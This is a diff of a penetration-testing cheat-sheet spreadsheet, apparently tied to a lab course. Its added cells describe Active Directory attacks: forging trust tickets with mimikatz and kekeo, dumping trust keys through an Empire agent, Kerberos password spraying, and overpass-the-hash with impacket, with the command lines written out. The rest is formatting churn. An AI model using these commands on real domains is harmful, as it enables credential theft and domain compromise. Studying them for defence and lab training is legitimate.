--- a/Pentest-CheatSheet.xlsx
+++ b/Pentest-CheatSheet.xlsx
@@ -5,7 +5,7 @@
   <workbookPr/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\SALLOUM\Desktop\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\mictec\Desktop\"/>
     </mc:Choice>
   </mc:AlternateContent>
   <bookViews>
@@ -19,7 +19,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="692" uniqueCount="627">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="715" uniqueCount="641">
   <si>
     <t>Passive Information Gathering</t>
   </si>
@@ -1785,9 +1785,6 @@
   </si>
   <si>
     <t>Explained in the MITM section</t>
-  </si>
-  <si>
-    <t>Pass-the-hash</t>
   </si>
   <si>
     <t>Discover Group policies inside a domain</t>
@@ -8453,6 +8450,88 @@
 # Methode 3: By using Nmap and Hping together:
                             - Step1: hping3 -S -r zoombieIPadd -p 135 
                             - Step2: namp -S ZoombieIP TargetIP -p 23 -n -e tap0 --disable-arp-ping</t>
+  </si>
+  <si>
+    <t>When a trust is created, there’s a shared password called inter-realm key. 
+This exists for all trusts regardless of them being created by an admin or automatically when adding a new domain to an AD forest.
+Imagin this scenario:
+A user on the blue domain is already logged on and wants to access a resource in the green domain, across the trust. 
+The DC on the blue domain creates and sends a new TGT to the user along with the referral to the green domain DC. 
+This cross-trust TGT is formatted in the same way as any TGT, BUT it is not signed by the KRBTGT account for either of these domains. 
+It’s singed and encrypted with the inter-realm key of the forest trust.
+If we can get access to this trust password then, we can forge this cross-domain ticket. 
+This means that we can impersonate any user in the blue domain and get access to any service or resource in the green domain that has been permissioned for the blue domain.</t>
+  </si>
+  <si>
+    <t xml:space="preserve"># Forge a Trust Ticket for an external trust to the AD forest
+- The trust key can be extracted when dumping AD credentials. 
+- Each trust has an associated account that contains the trust NTLM password hash. 
+- This is what we will use to forge Trust Tickets. The command we will use is:
+  &gt;&gt; kerberos::golden /domain:current_domain /sid:current_domain’s_SID/rc4:trust_password_NTLM_hash /user:Administrator /service:krbtgt/target:external_domain_FQDN /ticket:path_to_save_the_TGS
+- Once the trust ticket is created, we can use kekeo’sasktgs to get a TGS for any targeted service in the external domain. For example, for the cifs service we would execute:
+  &gt;&gt; .\asktgs path_of_the_trust_ticket cifs/domain_controller_of_external_domain
+- If we now inject that TGS, using kekeo’sKirbikator we will be able to access the targeted service, on the external domain.
+  &gt;&gt; .\Kirbikator lsa path_to_TGS
+- It should be noted that the targeted domain must have explicit permissions set for groups or users in the trusted domain, something which is not uncommon.
+</t>
+  </si>
+  <si>
+    <t>Forging Trust Ticket for an internal trust to the AD forest</t>
+  </si>
+  <si>
+    <t># Mimikatz can also extract all internal trust password data from an AD domain. 
+- For example, we would execute the following when interacting with a PowerShell empire agent to extract all internal trust password data.
+  &gt;&gt; usemodule credentials/mimikatz/command
+  &gt;&gt; set Command set Command lsadump::trust /patch
+     ---Mimikatzpatches the LSASS proc
+- We can use this trust NTLM password to forge a trust ticket and compromise the parent. 
+  To forge a trust ticket for an internal trust, you can follow the same procedure we used for an external trust.</t>
+  </si>
+  <si>
+    <t>Kerberos Attack [Leveraging Kerberos authentication]</t>
+  </si>
+  <si>
+    <t>password spraying using kerberos</t>
+  </si>
+  <si>
+    <t># Finally, if you perform password spraying over SMB (for example via metasploit’ssmb_login module), chances are you will get caught. Kerberos is stealthier for that. 
+  You can use Kerberos for password spraying using this script
+  &gt;&gt; ./kinit_user_brute.sh domain domain controller username_list password
+     ./kinit_user_brute.sh ELS lab-dc01.els.local /root/Desktop/userList.txt P@ssw0rd12</t>
+  </si>
+  <si>
+    <t># kerberos ticket when NTLM disabled:
+  If NTLM is disabled, you can configure Kerberos in your attacking machine to checkout a TGT
+- One way to do this is the following, using impacket. Suppose we identified the ‘2ndAdmin’ user’s credentials.
+  &gt;&gt; kinit 2ndAdmin@ELS.LOCAL
+  &gt;&gt; KRB5CCNAME=/tmp/krb5cc_0 python wmiexec.py -k -no-pass els.local/2ndAdmin@user8.els.local
+     ---The -k indicates that we are using Kerberos authentication (i.e. the TGT we created with the kinit command
+- If you happen to be in possession of a valid password hash and NTLM is disabled, you can OverPass-the-Hash, as follows.
+  &gt;&gt; ktutil -k ~/mykeys add -p 2ndAdmin@ELS.LOCAL -e arcfour-hmac-md5 -w 49623ccc820122ab49b3f0f571b77186 --hex -V 5
+     ---Switching the NTLM password hash of the 2ndAdmin user into a Kerberos ticket.
+  &gt;&gt; kinit -t ~/mykeys 2ndAdmin@ELS.LOCAL
+  &gt;&gt; KRB5CCNAME=/tmp/krb5cc_0 python wmiexec.py -k -no-pass els.local/2ndAdmin@user8.els.local</t>
+  </si>
+  <si>
+    <t>kerberos ticket when NTLM disabled</t>
+  </si>
+  <si>
+    <t>Pass-the-hash [PtH Over SMB]</t>
+  </si>
+  <si>
+    <t>Pass-the-hash [PtH over PsExec]</t>
+  </si>
+  <si>
+    <t>Pass-the-hash [PtH Over WMI]</t>
+  </si>
+  <si>
+    <t>Pass-the-hash [PtH Over RPCB]</t>
+  </si>
+  <si>
+    <t>Coming soon :)</t>
+  </si>
+  <si>
+    <t>coming soon :)</t>
   </si>
 </sst>
 </file>
@@ -8744,7 +8823,7 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
     <xf numFmtId="0" fontId="4" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
   </cellStyleXfs>
-  <cellXfs count="76">
+  <cellXfs count="74">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
     <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
@@ -8781,9 +8860,6 @@
     <xf numFmtId="0" fontId="14" fillId="4" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
     <xf numFmtId="0" fontId="11" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
     <xf numFmtId="0" fontId="14" fillId="4" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment wrapText="1"/>
-    </xf>
-    <xf numFmtId="0" fontId="12" fillId="13" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="11" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
@@ -8877,7 +8953,6 @@
     <xf numFmtId="0" fontId="14" fillId="5" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="11" fillId="11" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
     <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment vertical="center"/>
     </xf>
@@ -9292,10 +9367,10 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <dimension ref="A1:E319"/>
+  <dimension ref="A1:E326"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A284" zoomScale="106" zoomScaleNormal="106" workbookViewId="0">
-      <selection activeCell="D315" sqref="D315"/>
+    <sheetView tabSelected="1" zoomScale="106" zoomScaleNormal="106" workbookViewId="0">
+      <selection activeCell="C19" sqref="C19"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultColWidth="9.140625" defaultRowHeight="10.5" customHeight="1" x14ac:dyDescent="0.2"/>
@@ -9303,24 +9378,24 @@
     <col min="1" max="1" width="19.28515625" style="1" bestFit="1" customWidth="1"/>
     <col min="2" max="2" width="54" style="19" bestFit="1" customWidth="1"/>
     <col min="3" max="3" width="55" style="19" customWidth="1"/>
-    <col min="4" max="4" width="99" style="38" customWidth="1"/>
+    <col min="4" max="4" width="99" style="37" customWidth="1"/>
     <col min="5" max="5" width="57.140625" style="1" customWidth="1"/>
     <col min="6" max="16384" width="9.140625" style="1"/>
   </cols>
   <sheetData>
     <row r="1" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="A1" s="74" t="s">
-        <v>330</v>
-      </c>
-      <c r="B1" s="74"/>
-      <c r="C1" s="74"/>
-      <c r="D1" s="75"/>
+      <c r="A1" s="72" t="s">
+        <v>329</v>
+      </c>
+      <c r="B1" s="72"/>
+      <c r="C1" s="72"/>
+      <c r="D1" s="73"/>
     </row>
     <row r="2" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="A2" s="74"/>
-      <c r="B2" s="74"/>
-      <c r="C2" s="74"/>
-      <c r="D2" s="75"/>
+      <c r="A2" s="72"/>
+      <c r="B2" s="72"/>
+      <c r="C2" s="72"/>
+      <c r="D2" s="73"/>
     </row>
     <row r="5" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B5" s="9" t="s">
@@ -9339,7 +9414,7 @@
       </c>
       <c r="C6" s="12"/>
       <c r="D6" s="13" t="s">
-        <v>339</v>
+        <v>338</v>
       </c>
       <c r="E6" s="2"/>
     </row>
@@ -9375,7 +9450,7 @@
         <v>104</v>
       </c>
       <c r="D9" s="15" t="s">
-        <v>340</v>
+        <v>339</v>
       </c>
     </row>
     <row r="10" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
@@ -9416,27 +9491,27 @@
         <v>231</v>
       </c>
       <c r="D14" s="13" t="s">
-        <v>621</v>
+        <v>620</v>
       </c>
     </row>
     <row r="15" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B15" s="72" t="s">
-        <v>623</v>
+      <c r="B15" s="70" t="s">
+        <v>622</v>
       </c>
       <c r="C15" s="23"/>
       <c r="D15" s="13" t="s">
+        <v>623</v>
+      </c>
+    </row>
+    <row r="16" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B16" s="70" t="s">
+        <v>621</v>
+      </c>
+      <c r="C16" s="71" t="s">
         <v>624</v>
       </c>
-    </row>
-    <row r="16" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B16" s="72" t="s">
-        <v>622</v>
-      </c>
-      <c r="C16" s="73" t="s">
+      <c r="D16" s="69" t="s">
         <v>625</v>
-      </c>
-      <c r="D16" s="71" t="s">
-        <v>626</v>
       </c>
     </row>
     <row r="17" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
@@ -9446,28 +9521,30 @@
       <c r="C17" s="25" t="s">
         <v>277</v>
       </c>
-      <c r="D17" s="26"/>
+      <c r="D17" s="36" t="s">
+        <v>640</v>
+      </c>
     </row>
     <row r="18" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B18" s="24" t="s">
         <v>43</v>
       </c>
-      <c r="C18" s="27" t="s">
+      <c r="C18" s="26" t="s">
         <v>108</v>
       </c>
-      <c r="D18" s="28" t="s">
-        <v>341</v>
+      <c r="D18" s="27" t="s">
+        <v>340</v>
       </c>
     </row>
     <row r="19" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B19" s="24" t="s">
         <v>42</v>
       </c>
-      <c r="C19" s="27" t="s">
+      <c r="C19" s="26" t="s">
         <v>119</v>
       </c>
-      <c r="D19" s="28" t="s">
-        <v>342</v>
+      <c r="D19" s="27" t="s">
+        <v>341</v>
       </c>
     </row>
     <row r="20" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
@@ -9477,8 +9554,8 @@
       <c r="C20" s="24" t="s">
         <v>107</v>
       </c>
-      <c r="D20" s="28" t="s">
-        <v>343</v>
+      <c r="D20" s="27" t="s">
+        <v>342</v>
       </c>
     </row>
     <row r="21" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
@@ -9488,8 +9565,8 @@
       <c r="C21" s="24" t="s">
         <v>97</v>
       </c>
-      <c r="D21" s="28" t="s">
-        <v>344</v>
+      <c r="D21" s="27" t="s">
+        <v>343</v>
       </c>
     </row>
     <row r="22" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
@@ -9499,62 +9576,62 @@
       <c r="C22" s="24" t="s">
         <v>91</v>
       </c>
-      <c r="D22" s="28" t="s">
-        <v>345</v>
+      <c r="D22" s="27" t="s">
+        <v>344</v>
       </c>
     </row>
     <row r="23" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B23" s="24" t="s">
         <v>38</v>
       </c>
-      <c r="C23" s="27" t="s">
+      <c r="C23" s="26" t="s">
         <v>98</v>
       </c>
-      <c r="D23" s="28" t="s">
+      <c r="D23" s="27" t="s">
+        <v>345</v>
+      </c>
+    </row>
+    <row r="24" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B24" s="28" t="s">
+        <v>44</v>
+      </c>
+      <c r="C24" s="29" t="s">
+        <v>118</v>
+      </c>
+      <c r="D24" s="15" t="s">
         <v>346</v>
       </c>
     </row>
-    <row r="24" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B24" s="29" t="s">
-        <v>44</v>
-      </c>
-      <c r="C24" s="30" t="s">
-        <v>118</v>
-      </c>
-      <c r="D24" s="15" t="s">
-        <v>347</v>
-      </c>
-    </row>
     <row r="25" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B25" s="29" t="s">
+      <c r="B25" s="28" t="s">
         <v>234</v>
       </c>
-      <c r="C25" s="30"/>
+      <c r="C25" s="29"/>
       <c r="D25" s="15" t="s">
         <v>235</v>
       </c>
     </row>
     <row r="26" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B26" s="29" t="s">
+      <c r="B26" s="28" t="s">
         <v>34</v>
       </c>
-      <c r="C26" s="31" t="s">
+      <c r="C26" s="30" t="s">
         <v>189</v>
       </c>
       <c r="D26" s="15" t="s">
-        <v>549</v>
+        <v>548</v>
       </c>
       <c r="E26" s="2"/>
     </row>
     <row r="27" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B27" s="29" t="s">
+      <c r="B27" s="28" t="s">
         <v>35</v>
       </c>
-      <c r="C27" s="31" t="s">
+      <c r="C27" s="30" t="s">
         <v>190</v>
       </c>
       <c r="D27" s="15" t="s">
-        <v>348</v>
+        <v>347</v>
       </c>
       <c r="E27" s="2"/>
     </row>
@@ -9564,8 +9641,8 @@
         <v>90</v>
       </c>
       <c r="C28" s="24"/>
-      <c r="D28" s="28" t="s">
-        <v>349</v>
+      <c r="D28" s="27" t="s">
+        <v>348</v>
       </c>
       <c r="E28" s="2"/>
     </row>
@@ -9575,34 +9652,34 @@
         <v>37</v>
       </c>
       <c r="C29" s="24"/>
-      <c r="D29" s="28" t="s">
-        <v>350</v>
+      <c r="D29" s="27" t="s">
+        <v>349</v>
       </c>
       <c r="E29" s="2"/>
     </row>
     <row r="30" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A30" s="4"/>
-      <c r="B30" s="29" t="s">
+      <c r="B30" s="28" t="s">
         <v>36</v>
       </c>
-      <c r="C30" s="31" t="s">
+      <c r="C30" s="30" t="s">
         <v>121</v>
       </c>
       <c r="D30" s="15" t="s">
-        <v>351</v>
+        <v>350</v>
       </c>
       <c r="E30" s="2"/>
     </row>
     <row r="31" spans="1:5" s="4" customFormat="1" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B31" s="32"/>
-      <c r="C31" s="33"/>
-      <c r="D31" s="34"/>
+      <c r="B31" s="31"/>
+      <c r="C31" s="32"/>
+      <c r="D31" s="33"/>
       <c r="E31" s="3"/>
     </row>
     <row r="32" spans="1:5" s="4" customFormat="1" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B32" s="32"/>
-      <c r="C32" s="33"/>
-      <c r="D32" s="34"/>
+      <c r="B32" s="31"/>
+      <c r="C32" s="32"/>
+      <c r="D32" s="33"/>
       <c r="E32" s="3"/>
     </row>
     <row r="33" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
@@ -9612,7 +9689,7 @@
       <c r="C33" s="10" t="s">
         <v>117</v>
       </c>
-      <c r="D33" s="35" t="s">
+      <c r="D33" s="34" t="s">
         <v>1</v>
       </c>
       <c r="E33" s="2"/>
@@ -9625,8 +9702,8 @@
       <c r="C34" s="17" t="s">
         <v>135</v>
       </c>
-      <c r="D34" s="36" t="s">
-        <v>352</v>
+      <c r="D34" s="35" t="s">
+        <v>351</v>
       </c>
       <c r="E34" s="2"/>
     </row>
@@ -9636,7 +9713,7 @@
         <v>142</v>
       </c>
       <c r="C35" s="17"/>
-      <c r="D35" s="36" t="s">
+      <c r="D35" s="35" t="s">
         <v>175</v>
       </c>
       <c r="E35" s="2"/>
@@ -9649,7 +9726,7 @@
       <c r="C36" s="17" t="s">
         <v>136</v>
       </c>
-      <c r="D36" s="36" t="s">
+      <c r="D36" s="35" t="s">
         <v>137</v>
       </c>
       <c r="E36" s="2"/>
@@ -9657,106 +9734,110 @@
     <row r="37" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A37" s="6"/>
       <c r="B37" s="14" t="s">
-        <v>550</v>
+        <v>549</v>
       </c>
       <c r="C37" s="17" t="s">
         <v>199</v>
       </c>
-      <c r="D37" s="36" t="s">
-        <v>485</v>
+      <c r="D37" s="35" t="s">
+        <v>484</v>
       </c>
       <c r="E37" s="2"/>
     </row>
     <row r="38" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A38" s="6"/>
       <c r="B38" s="14" t="s">
-        <v>551</v>
+        <v>550</v>
       </c>
       <c r="C38" s="17" t="s">
-        <v>479</v>
-      </c>
-      <c r="D38" s="36"/>
+        <v>478</v>
+      </c>
+      <c r="D38" s="35"/>
       <c r="E38" s="2"/>
     </row>
     <row r="39" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A39" s="6"/>
       <c r="B39" s="14" t="s">
-        <v>552</v>
+        <v>551</v>
       </c>
       <c r="C39" s="17" t="s">
-        <v>481</v>
-      </c>
-      <c r="D39" s="36" t="s">
-        <v>478</v>
+        <v>480</v>
+      </c>
+      <c r="D39" s="35" t="s">
+        <v>477</v>
       </c>
       <c r="E39" s="2"/>
     </row>
     <row r="40" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A40" s="6"/>
       <c r="B40" s="24" t="s">
-        <v>553</v>
-      </c>
-      <c r="C40" s="27" t="s">
-        <v>480</v>
-      </c>
-      <c r="D40" s="28" t="s">
-        <v>477</v>
+        <v>552</v>
+      </c>
+      <c r="C40" s="26" t="s">
+        <v>479</v>
+      </c>
+      <c r="D40" s="27" t="s">
+        <v>476</v>
       </c>
       <c r="E40" s="2"/>
     </row>
     <row r="41" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A41" s="6"/>
       <c r="B41" s="24" t="s">
-        <v>554</v>
-      </c>
-      <c r="C41" s="27" t="s">
-        <v>482</v>
-      </c>
-      <c r="D41" s="28"/>
+        <v>553</v>
+      </c>
+      <c r="C41" s="26" t="s">
+        <v>481</v>
+      </c>
+      <c r="D41" s="27"/>
       <c r="E41" s="2"/>
     </row>
     <row r="42" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A42" s="6"/>
       <c r="B42" s="24" t="s">
-        <v>555</v>
-      </c>
-      <c r="C42" s="27" t="s">
-        <v>483</v>
-      </c>
-      <c r="D42" s="28"/>
+        <v>554</v>
+      </c>
+      <c r="C42" s="26" t="s">
+        <v>482</v>
+      </c>
+      <c r="D42" s="27"/>
       <c r="E42" s="2"/>
     </row>
     <row r="43" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A43" s="6"/>
       <c r="B43" s="14" t="s">
-        <v>556</v>
+        <v>555</v>
       </c>
       <c r="C43" s="17" t="s">
-        <v>484</v>
-      </c>
-      <c r="D43" s="36"/>
+        <v>483</v>
+      </c>
+      <c r="D43" s="35"/>
       <c r="E43" s="2"/>
     </row>
     <row r="44" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A44" s="6"/>
       <c r="B44" s="14" t="s">
-        <v>557</v>
+        <v>556</v>
       </c>
       <c r="C44" s="17" t="s">
         <v>198</v>
       </c>
-      <c r="D44" s="37"/>
+      <c r="D44" s="36" t="s">
+        <v>640</v>
+      </c>
       <c r="E44" s="2"/>
     </row>
     <row r="45" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="A45" s="6"/>
       <c r="B45" s="14" t="s">
-        <v>558</v>
+        <v>557</v>
       </c>
       <c r="C45" s="17" t="s">
         <v>151</v>
       </c>
-      <c r="D45" s="37"/>
+      <c r="D45" s="36" t="s">
+        <v>640</v>
+      </c>
       <c r="E45" s="2"/>
     </row>
     <row r="46" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
@@ -9765,7 +9846,7 @@
         <v>201</v>
       </c>
       <c r="C46" s="17"/>
-      <c r="D46" s="28" t="s">
+      <c r="D46" s="27" t="s">
         <v>144</v>
       </c>
       <c r="E46" s="2"/>
@@ -9778,7 +9859,7 @@
       <c r="C47" s="17" t="s">
         <v>221</v>
       </c>
-      <c r="D47" s="36" t="s">
+      <c r="D47" s="35" t="s">
         <v>196</v>
       </c>
       <c r="E47" s="2"/>
@@ -9791,7 +9872,7 @@
       <c r="C48" s="17" t="s">
         <v>202</v>
       </c>
-      <c r="D48" s="36" t="s">
+      <c r="D48" s="35" t="s">
         <v>203</v>
       </c>
       <c r="E48" s="2"/>
@@ -9804,7 +9885,7 @@
       <c r="C49" s="17" t="s">
         <v>147</v>
       </c>
-      <c r="D49" s="36" t="s">
+      <c r="D49" s="35" t="s">
         <v>145</v>
       </c>
       <c r="E49" s="2"/>
@@ -9817,7 +9898,7 @@
       <c r="C50" s="17" t="s">
         <v>197</v>
       </c>
-      <c r="D50" s="36" t="s">
+      <c r="D50" s="35" t="s">
         <v>146</v>
       </c>
       <c r="E50" s="2"/>
@@ -9830,7 +9911,7 @@
     <row r="52" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B52" s="20"/>
       <c r="C52" s="21"/>
-      <c r="D52" s="34"/>
+      <c r="D52" s="33"/>
       <c r="E52" s="2"/>
     </row>
     <row r="53" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
@@ -9840,7 +9921,7 @@
       <c r="C53" s="10" t="s">
         <v>117</v>
       </c>
-      <c r="D53" s="35" t="s">
+      <c r="D53" s="34" t="s">
         <v>1</v>
       </c>
       <c r="E53" s="2"/>
@@ -9853,7 +9934,7 @@
         <v>92</v>
       </c>
       <c r="D54" s="13" t="s">
-        <v>353</v>
+        <v>352</v>
       </c>
       <c r="E54" s="2"/>
     </row>
@@ -9863,7 +9944,7 @@
     <row r="56" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
       <c r="B56" s="20"/>
       <c r="C56" s="21"/>
-      <c r="D56" s="34"/>
+      <c r="D56" s="33"/>
       <c r="E56" s="2"/>
     </row>
     <row r="57" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
@@ -9873,7 +9954,7 @@
       <c r="C57" s="10" t="s">
         <v>117</v>
       </c>
-      <c r="D57" s="35" t="s">
+      <c r="D57" s="34" t="s">
         <v>1</v>
       </c>
     </row>
@@ -9883,117 +9964,117 @@
       </c>
       <c r="C58" s="23"/>
       <c r="D58" s="13" t="s">
+        <v>353</v>
+      </c>
+    </row>
+    <row r="59" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B59" s="28" t="s">
+        <v>11</v>
+      </c>
+      <c r="C59" s="28"/>
+      <c r="D59" s="15" t="s">
         <v>354</v>
       </c>
     </row>
-    <row r="59" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B59" s="29" t="s">
-        <v>11</v>
-      </c>
-      <c r="C59" s="29"/>
-      <c r="D59" s="15" t="s">
+    <row r="60" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B60" s="28" t="s">
+        <v>12</v>
+      </c>
+      <c r="C60" s="28"/>
+      <c r="D60" s="15" t="s">
         <v>355</v>
       </c>
     </row>
-    <row r="60" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B60" s="29" t="s">
-        <v>12</v>
-      </c>
-      <c r="C60" s="29"/>
-      <c r="D60" s="15" t="s">
+    <row r="61" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B61" s="28" t="s">
+        <v>13</v>
+      </c>
+      <c r="C61" s="28"/>
+      <c r="D61" s="15" t="s">
         <v>356</v>
       </c>
     </row>
-    <row r="61" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B61" s="29" t="s">
-        <v>13</v>
-      </c>
-      <c r="C61" s="29"/>
-      <c r="D61" s="15" t="s">
+    <row r="62" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B62" s="28" t="s">
+        <v>14</v>
+      </c>
+      <c r="C62" s="28"/>
+      <c r="D62" s="15" t="s">
         <v>357</v>
       </c>
     </row>
-    <row r="62" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B62" s="29" t="s">
-        <v>14</v>
-      </c>
-      <c r="C62" s="29"/>
-      <c r="D62" s="15" t="s">
+    <row r="63" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B63" s="28" t="s">
+        <v>15</v>
+      </c>
+      <c r="C63" s="38"/>
+      <c r="D63" s="15" t="s">
         <v>358</v>
       </c>
     </row>
-    <row r="63" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B63" s="29" t="s">
-        <v>15</v>
-      </c>
-      <c r="C63" s="39"/>
-      <c r="D63" s="15" t="s">
-        <v>359</v>
-      </c>
-    </row>
     <row r="64" spans="1:5" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B64" s="29" t="s">
+      <c r="B64" s="28" t="s">
         <v>16</v>
       </c>
-      <c r="C64" s="29"/>
+      <c r="C64" s="28"/>
       <c r="D64" s="15" t="s">
         <v>17</v>
       </c>
     </row>
     <row r="65" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B65" s="29" t="s">
+      <c r="B65" s="28" t="s">
         <v>18</v>
       </c>
-      <c r="C65" s="29"/>
+      <c r="C65" s="28"/>
       <c r="D65" s="15" t="s">
         <v>19</v>
       </c>
     </row>
     <row r="66" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B66" s="29" t="s">
+      <c r="B66" s="28" t="s">
         <v>20</v>
       </c>
-      <c r="C66" s="29"/>
+      <c r="C66" s="28"/>
       <c r="D66" s="15" t="s">
         <v>21</v>
       </c>
     </row>
     <row r="67" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B67" s="29" t="s">
+      <c r="B67" s="28" t="s">
         <v>89</v>
       </c>
-      <c r="C67" s="29"/>
+      <c r="C67" s="28"/>
       <c r="D67" s="15" t="s">
+        <v>359</v>
+      </c>
+    </row>
+    <row r="68" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
+      <c r="B68" s="28" t="s">
+        <v>88</v>
+      </c>
+      <c r="C68" s="38"/>
+      <c r="D68" s="15" t="s">
         <v>360</v>
       </c>
     </row>
-    <row r="68" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B68" s="29" t="s">
-        <v>88</v>
-      </c>
-      <c r="C68" s="39"/>
-      <c r="D68" s="15" t="s">
-        <v>361</v>
-      </c>
-    </row>
     <row r="69" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B69" s="29" t="s">
+      <c r="B69" s="28" t="s">
         <v>32</v>
       </c>
-      <c r="C69" s="29"/>
+      <c r="C69" s="28"/>
       <c r="D69" s="15" t="s">
         <v>33</v>
       </c>
     </row>
     <row r="70" spans="1:4" ht="10.5" customHeight="1" x14ac:dyDescent="0.2">
-      <c r="B70" s="32"/>
-      <c r="C70" s="32"/>
-      <c r="D70" s="34"/>
+      <c r="B70" s="31"/>
+      <c r="C70" s="31"/>
+      <c r="D70" s="33"/>
     </row>
